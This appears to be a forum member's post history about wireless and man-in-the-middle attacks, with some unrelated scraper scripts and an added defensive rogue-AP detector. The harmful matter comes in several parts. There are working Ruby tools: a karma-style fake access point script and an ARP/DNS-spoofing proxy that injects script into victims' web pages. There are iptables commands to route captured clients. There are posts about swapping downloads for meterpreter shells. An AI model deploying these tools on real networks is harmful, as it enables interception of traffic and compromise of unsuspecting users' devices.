
i8igmac
Dedicated Members
Posts: 939
Days Won: 22

Everything posted by i8igmac

  1. iwconfig wlan0 channel 6
     ifconfig wlan0 down
     iwconfig wlan0 mode monitor
     ifconfig wlan0 up
     airbase-ng wlan0 -e test-ap-channel-6

     New tab in console:

     airodump-ng wlan0

     So we have airodump channel hopping and at the same time airbase is broadcasting a fake AP on channel 6... On my Linux Mint everything is working as I need. My goal is to capture with airodump all client probe requests and then start airbase on channel 6 with the newly captured probe requests... The problem is when I run these same commands above in Kali Linux. When airodump has your card channel hopping, your same wlan device running airbase is also channel hopping... Any ideas why Linux Mint allows me to accomplish this?
  2. I had to boot up Kali to get a working example of a fake AP with dnsmasq... simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html and don't forget to add iptables to complete your clients' internet connection. wlan1 has established a connection to my Droid hotspot 4G network... at0 traffic will now pass through:

     iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
     iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
     iptables --append FORWARD --in-interface at0 -j ACCEPT
     echo 1 > /proc/sys/net/ipv4/ip_forward
  3. Maybe some help setting up DHCP. I have nothing but problems with dhcpd3... maybe some simple alternatives. Laptop has 2 wifi devices. wlan1 is connected to Droid 4G, 192.168.43.130. wlan0 will be airbase-ng, so should I set ifconfig at0 192.168.44.1 up? Also how would you configure DHCP 192.168.0.100-250???
  4. karma was trouble to install on my machine, I didn't feel like booting BT... so here is a fake AP script... it will capture clients' probe requests and start a new ESSID...

     #start airodump-ng wlan0 -w airbase
     # this will simply scan the airbase csv file for client probes
     @pid_list=[] # this will hold the list of running essids, "netgear", "freewifi", "cisco"

     def refresh_list
       # read the airodump csv file and sort through the clients
       data=File.open("airbase-01.csv","r")
       block=data.read
       data.close
       cut=block.index("\r\n\r\n")
       block_1=block[146..cut]    # here is your list of access points...
       block_2=block[cut+90..-1]  # here is your list of clients
       buff=[]
       block_2.each_line{|x| buff<< x.split(",")[5..-1]}
       buff.uniq.each{|x|
         next if x==nil
         x.each{|y|
           # skip the BSSID column and unassociated markers, keep only probed names
           next if y.include?(":") or y.include?("(not associated)")
           z=y.strip
           if z.size>=1 and not @pid_list.include?(z)
             Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}
             @pid_list<<z
           end
         }
       }
     end

     refresh_list
     while true
       sleep 10
       refresh_list
     end
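Added example, not from i8igmac's post: the same airodump-ng CSV that the script above reads can be used from the defender's side to recognise what a karma-style fake AP looks like in a capture. The Ruby below parses the AP and station tables of a constructed (not captured) CSV and flags an ESSID advertised by more than one BSSID with different security settings, a BSSID missing from an optional trusted list for that ESSID, and any open AP whose name matches what a client is probing for. Column positions follow the airodump-ng CSV layout; the sample rows, `parse_airodump` and `find_rogue_aps` are all constructed here.

```ruby
# Added example (not from the original post): spot evil-twin / karma-style APs in an
# airodump-ng CSV dump. Sample data below is constructed, not a real capture.
require 'set'

# airodump-ng writes a blank line, the AP table, a blank line, then the station table.
SAMPLE_CSV = [
  "",
  "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key",
  "00:11:22:33:44:55, 2013-07-01 10:00:00, 2013-07-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  100,  0,  0.  0.  0.  0,  7, netgear, ",
  "66:77:88:99:AA:BB, 2013-07-01 10:02:00, 2013-07-01 10:05:00,  6,  54, OPN,  ,   , -30,  50,  0,  0.  0.  0.  0,  7, netgear, ",
  "CC:DD:EE:FF:00:11, 2013-07-01 10:02:00, 2013-07-01 10:05:00, 11,  54, OPN,  ,   , -35,  20,  0,  0.  0.  0.  0,  8, freewifi, ",
  "22:33:44:55:66:77, 2013-07-01 10:00:00, 2013-07-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -60,  80,  0,  0.  0.  0.  0,  5, cisco, ",
  "",
  "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs",
  "AA:BB:CC:DD:EE:FF, 2013-07-01 10:01:00, 2013-07-01 10:05:00, -50,  10, (not associated) ,netgear,freewifi",
  "11:22:33:44:55:66, 2013-07-01 10:01:00, 2013-07-01 10:05:00, -45,  30, 22:33:44:55:66:77, ",
  ""
].join("\r\n")

# Split the dump into its two tables and pull out the columns we need.
# AP row: 0 BSSID, 3 channel, 5 Privacy, 13 ESSID. Station row: 0 MAC, 5 BSSID, 6.. probed names.
def parse_airodump(csv_text)
  ap_block, sta_block = csv_text.sub(/\A\s+/, "").split(/\r?\n[ \t]*\r?\n/, 2)
  aps = ap_block.lines.drop(1)
          .map { |l| l.split(",").map(&:strip) }
          .select { |f| f.size >= 14 }
          .map { |f| { bssid: f[0], channel: f[3], privacy: f[5], essid: f[13] } }
  stations = (sta_block || "").lines.drop(1)
          .map { |l| l.split(",").map(&:strip) }
          .select { |f| f.size >= 6 }
          .map { |f| { mac: f[0], bssid: f[5], probes: f[6..-1].to_a.reject(&:empty?) } }
  [aps, stations]
end

# trusted: optional {"essid" => ["known bssid", ...]} map of the APs you actually own.
def find_rogue_aps(csv_text, trusted = {})
  aps, stations = parse_airodump(csv_text)
  probed = stations.flat_map { |s| s[:probes] }.to_set
  findings = []
  aps.group_by { |a| a[:essid] }.each do |essid, group|
    next if essid.empty?
    bssids = group.map { |a| a[:bssid] }.uniq
    privs  = group.map { |a| a[:privacy] }.uniq
    # One name, several radios, different security settings: the classic evil-twin signature.
    if bssids.size > 1 && privs.size > 1
      findings << { essid: essid, reason: "same ESSID advertised with mixed security", bssids: bssids }
    end
    # Anything not in the allow-list for a name we manage is rogue by definition.
    if trusted.key?(essid)
      rogue = bssids - trusted[essid]
      findings << { essid: essid, reason: "unknown BSSID for trusted ESSID", bssids: rogue } unless rogue.empty?
    end
    # An open AP whose name equals a client's probe is exactly what a karma-style AP produces.
    group.each do |a|
      if a[:privacy] == "OPN" && probed.include?(essid)
        findings << { essid: essid, reason: "open AP answering a client probe", bssids: [a[:bssid]] }
      end
    end
  end
  findings
end

if __FILE__ == $0
  find_rogue_aps(SAMPLE_CSV, "netgear" => ["00:11:22:33:44:55"]).each do |f|
    puts "#{f[:essid]}: #{f[:reason]} (#{f[:bssids].join(', ')})"
  end
end
```

Run it against a real dump with `find_rogue_aps(File.read("airbase-01.csv"), your_trusted_map)`; the probe-match rule is the one that fires on the script above, because that script only ever brings up open networks named after what clients ask for.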
  5. If I may try... Think about a walkie talkie. Those hand held radios can change channels by pressing a button... If you and your friend both have walkie talkies on channel 1 then you can share a conversation... Your walkie talkie can also channel hop. That could allow you to listen to all conversations on all channels by changing channels quickly. If you notice when you run airodump, your wifi card is channel hopping, trying to record data on all channels. I tried :-) Edit. misread the question..
  6. Very true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol

     if finger.include?("windows")
       s.puts(meterpreter.exe)
     end

     Just an example, above... if anyone is interested in a team project. I made this example a few years ago... (I meant to post in community projects....) All the code is in my head, I have no time to build this. Packet manipulation is much needed around here
  7. Proxy source http://pastebin.com/n7AHi5Ny. During man in the middle, if a client downloads an executable of any kind... swap that data with meterpreter... I notice people request or ask for this kind of exploit... Rar, zip, msi, exe etc... maybe this community can help me build something from this proof of concept...
  8. I have found the 1000 most common SSIDs. And my mistake for saying essids
  9. My phone for example will automatically connect to dd-wrt. Can a client's saved access point be guessed? airbase-ng wlan0 -e dd-wrt. Is there an essid dictionary file? Maybe what I am trying to do already exists?
  10. From Droid... There are a few steps you may have to take. Maybe set uid in the ettercap config. Enable IP forwarding per iptables or ipchains, OS specific. These 2 above would help you Google search. Content-length also plays a big part when modding data, always try something simple like replace(poo for pee). Try several webpages during your test, msn, yahoo etc... Not https... I have some proof of concept I wrote in ruby, when a user downloads an executable during mitm, the binary data is replaced with a meterpreter shell https://vimeo.com/51230425
  11. #will get trailers....
      #depends on apt-get install rtmpdump and wget
      #set of rules for this to work... the name of the folder must be the proper name as listed below, these names are also an exact match from imdb
      #/media/500_gig/movies/21 jump street (2012)/movie_file.avi <-------- GOOD
      #/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi <--- BAD
      #example
      # ls /media/500_gig/movies/
      # 21 Jump Street (2012)
      # antitrust (2001)
      # Avatar (2009)
      # Basketball diaries (1995)
      # be kind rewind (2008)
      # blank check (1994)
      # blow (2001)
      # buffalo soldiers (2001)
      #run this script from any directory... the destination directory must be changed below
      #sudo ruby get_trailer "movie name (2000)"    need sudo to write data to the hard drive
      require 'socket'
      require 'cgi'

      puts movie_name=ARGV[0]
      dst_dir="/media/6E88F3A627ADD9B7/movies/#{movie_name}/" #- <--------change this
      movie_name=movie_name.gsub(" ","+").chomp

      # search imdb for the title
      s=TCPSocket.open("www.imdb.com",80)
      s.print("GET /find?q=#{movie_name} HTTP/1.0\r\n\r\n")
      buff=""
      while line=s.gets
        buff<<line
      end
      s.close

      #gather movie_home link
      buff=buff.gsub('"',"")
      ping=buff.index("/title/")
      if ping==nil
        puts"EXIT: next"
        exit
      else
        movie_home=buff[ping..ping+16] # IFRAME home page / Root page crawl from starting point
        tt=buff[ping+7..ping+15]
      end

      # fetch the title page
      s=TCPSocket.open("www.imdb.com",80)
      buff1=""
      s.print("GET /title/#{tt}/ HTTP/1.0\r\n\r\n")
      while line=s.gets
        buff1<<line
      end
      s.close

      image_link=buff1.scan(/media.rm.*./).first.to_s[0..26] # media/rm871673856/tt1232829
      rm=image_link.scan(/\/.*.\//).first.to_s

      # fetch the media page
      buff2=""
      s=TCPSocket.open("www.imdb.com",80)
      s.print("GET /media#{rm}#{tt}/ HTTP/1.0\r\n\r\n")
      while line=s.gets
        buff2<<line
      end
      s.close

      # request the player page for a trailer and return it with the quotes stripped
      def fetch_player_page(trailer_home)
        payload="GET /#{trailer_home}player?stop=0 HTTP/1.1\r\n"+
                "Host: www.imdb.com\r\n"+
                "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\n"+
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"+
                "Accept-Language: en-US,en;q=0.5\r\n"+
                "Proxy-Connection: keep-alive\r\n\r\n"
        buff3=""
        s=TCPSocket.open("www.imdb.com",80)
        s.print(payload)
        while line=s.recv(5000)
          break if line.empty? # recv returns "" once the server closes
          buff3<<line
          break if buff3.include?("</html>")
        end
        s.close
        buff3.gsub('"',"")
      end

      double_trailer_prevent=0
      if ping=buff1.index("video/imdb/vi")
        double_trailer_prevent=1
        puts trailer_home=buff1[ping..ping+28]
        trailer_home=trailer_home.scan(/video.imdb.vi.*.\//).first.to_s
        buff3=fetch_player_page(trailer_home)
        ping=buff3.index("so.addVariable(file, ")
        pong=buff3.index(");",ping)
        v_file=buff3[ping+21..pong-1]
        v_file=CGI.unescape(v_file)
        if v_file.include?("rtmp")
          ping=buff3.index("so.addVariable(id, ")
          pong=buff3.index(");",ping)
          v_id=buff3[ping+19..pong-1]
          v_id=CGI.unescape(v_id)
          q='"'
          puts"\n"
          system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'")
        end
      end

      if ping=buff1.index("video/screenplay/vi")
        if double_trailer_prevent==1
          puts "double file download attempt"
          exit
        end
        puts trailer_home=buff1[ping..ping+30]
        trailer_home=trailer_home.scan(/video.screenplay.vi.*.\//).first.to_s
        buff3=fetch_player_page(trailer_home)
        ping=buff3.index("so.addVariable(file, ")
        pong=buff3.index(");",ping)
        v_file=buff3[ping+21..pong-1]
        v_file=CGI.unescape(v_file)
        if v_file.include?("http")
          puts"\n"
          system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'")
        end
      end

      So, it's ugly... don't judge me... it was successful 95% of the time (wrong name = fail, or trailer does not exist). There is no error checking... now processing a whole list will take another small script... irb mode...

      data=`ls /media/500_gig/movies/`
      data.each_line do |movie_name|
        system("ruby get_trailer.rb '#{movie_name.chomp}'")
      end

      Now I hope to get some help with a template for the site... I just want to scroll through a list of images like Netflix... can someone contribute? I'm very noob at building a webpage... so maybe some decent example code would be appreciated...
  12. Droid response. That is the easy download, I was successful last night with downloading the RTMP stream :-) I got everything in order now, just need to mod my script then launch
  13. (first post was from a Droid so was quick; now I have an example to share) I have been using wireshark, tcpick, burp to investigate my way through traffic and this is a working download request... you can try it if you like or take my word for it...

      nc progressive.totaleclips.com.edgesuite.net 80 > out.mp4

      GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1
      Host: progressive.totaleclips.com.edgesuite.net
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf

      (working on some examples for another reply)
  14. I have an organized list of movies, I have automated movie cover dl, actor image dl and movie description document... I'm compiling this info into a website running on localhost. The most important feature is the trailer src, and I struggle to automate this download... Omdb provides very nice trailers that I hope to download OR just use the page/script source... I can engineer a proper GET request for a single download but I notice it's not a consistent src location... If someone can look at the page src of an IMDb trailer. I don't have the JavaScript skill to defeat the security they use to try to prevent this... I'm open for ideas, iframe src could be the main page but this is sloppy and I want to isolate the video only....
  15. This is one of those questions that comes up all the time... Your MAC address and local IP are not displayed across the internet. If you're on a public wifi then I see no reason to worry about downloads...
  16. I appreciate your response... I would like to share a dictionary I built for LFI scanning... I used some Google dorks to build it... http://pastebin.com/FdEJLbEu 255 possible files...
  17. Now this is just an example, I'm looking for help on building a list or a dictionary. I have built a few scanners and crawlers, I have an idea... I'm sure it's already been done but I like to do things my way... let's say you use wget to crawl and download an entire site, now you have all contents downloaded into a tmp directory, then use a linux command like grep (just for example) to find a string...

      cat /tmp/site_crawl/* | grep exec
      echo exec(var)
      echo pcntl_exec(var)
      ...

      Example of a list I would like to build:

      passthru
      system
      exec
      pcntl_exec
      `` (backtick operator)

      I'm looking for a universal list for finding ALL possibilities, not just PHP... I guess the goal is to find a way to execute or write data on the server... maybe there are vulnerabilities for CSS, Java, PHP etc... any string that may need further investigation... this is just an example, I'm sure you will never find any PHP exec etc in plain text...
  18. I am also looking to start from the bottom, I'm looking into certs A+ Sec+ Net+. I would also like some advice; if I could get my foot in the door I feel I would succeed...
  19. I have made a tool that will mass download from megaupload, huge time saver. There are no captcha images (security image) so this makes my script simple... As a paid user my tool could download 200 files at a time, or as a free user 1 at a time with a 30 second wait time... Another feature is a Google crawl to find whatever file you're looking for and whether the links are still working... Here is a tip, can be used with other file shares. Google search: inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
  21. i8igmac

    Trace Alert

    Hollywood sort of falsely advertises 'hacking'. This is a big reason why I spent endless hours learning. "What is a cookie virus": from the 1995 movie Hackers, a cookie scrolls across the screen and supposedly eats up memory... A cookie is used when your web browser logs into a server; this cookie could be sniffed or stolen and give a hacker access to these websites. This was my first question ;p
  22. i8igmac

    The Middler

    I have updated the above script: when the string "<head>" is found, the script inserts a small hello world script right after it and modifies the Content-Length of the current packet to make room for the extra data... all pages load properly and now I feel successful.

    HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    P3P: CP="Facebook
    Set-Cookie: _e_0xIM_4=deleted
    X-Cnection: close
    Date: Fri, 13 Jan 2012 02:58:17 GMT
    Content-Length: 110

    <html><head><title></title></head><body><span id="fbEmuTrackingSuccess">Success</span></body></html>

    Only if the packet includes "Content-Length:" AND the desired string "<head>" will the exploit be inserted... I have tried searching for other strings like <script> <head> <body> etc... they all produce the same results. The problem is, what if none of these exist? Then no pages will be modified... What if there are several packets responding to one GET request that match up with my desired algorithm? Then there may be 10 exploits inserted on one page...
  23. i8igmac

    The Middler

    For testing, set your browser's proxy settings to port 80... my goal is to have all pages modified and still load perfectly... my last test script:

    require 'eventmachine'

    attacker_ip="192.168.1.136"
    victim="192.168.1.110"
    gateway="192.168.1.1"

    dns = File.open("dns", "w+")
    dns.write("#{attacker_ip} *.*") # this is your ip,
    dns.close
    #"1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 ".split(/ /, 10).join
    #
    # set proxy settings in firefox to port 80
    # uncomment these lines when you want to use arpspoof/dns
    #`pkill spoof`
    #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
    #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
    #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns'"}
    #a.run
    #b.run
    #c.run

    # upstream side: relays the client's request to the real server and rewrites the reply
    class Client < EM::Connection
      def initialize(other, finger, *args, &blk)
        @other, @finger = other, finger
        super(*args, &blk)
      end

      def post_init
        # mangle Accept-Encoding so the server answers uncompressed and the body is searchable
        send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:")
      end

      def receive_data(response)
        clength = response.scan(/Content-Length: \d+/).first.to_s.sub("Content-Length: ","")
        #clength = response.scan(/Content-Length: \d+/).to_s.split.slice(1).to_i #+ 17
        #puts clength = response.scan(/Content-Length: \d+/)
        #puts clength
        #print "\n"
        if !response.include?("Content-Length: ") #&& !response.include?("<body>")
          @other.send_data response
        else
          if !response.include?("<head>")
            @other.send_data response
          else
            exploit="<script>alert('hello world')</script>"
            math=exploit.length
            puts response
            #@other.send_data response.sub("</title>","</titlE>\n<iframe src='http://192.168.1.103:8181/lol' width='0' height='0' </iframe>\n").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}")
            #@other.send_data response.sub("</title>","</titlE><script>alert('hellow world')</script>").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}")
            @other.send_data response.sub("<head>","<head>#{exploit}").sub("Content-Length: #{clength}","Content-Length: #{clength.to_i+math}") # .split(/ /, 9).join delete 9 blank spaces
          end
        end
      end
    end

    #browser open to http://192.168.1.114
    module EchoServer
      def receive_data(finger)
        #finger is the header received from the client, could log these cookies or log these pages
        #host = finger.to_a[1].chomp[6..-1]
        #host = finger.gsub(" ","").split[1].chomp[5..-1]
        #Thread.start{
        ping = finger.gsub(" ","").index("Host:")
        pong = finger.gsub(" ","").index("\n",ping)
        host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp
        #i dont know if this will prevent loading from cache
        data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
        #print finger
        #puts host
        EventMachine::connect host, 80, Client, self, data # ask google for data
      end
    end

    EventMachine::run {
      EventMachine::start_server attacker_ip, 80, EchoServer # YOUR IP
    }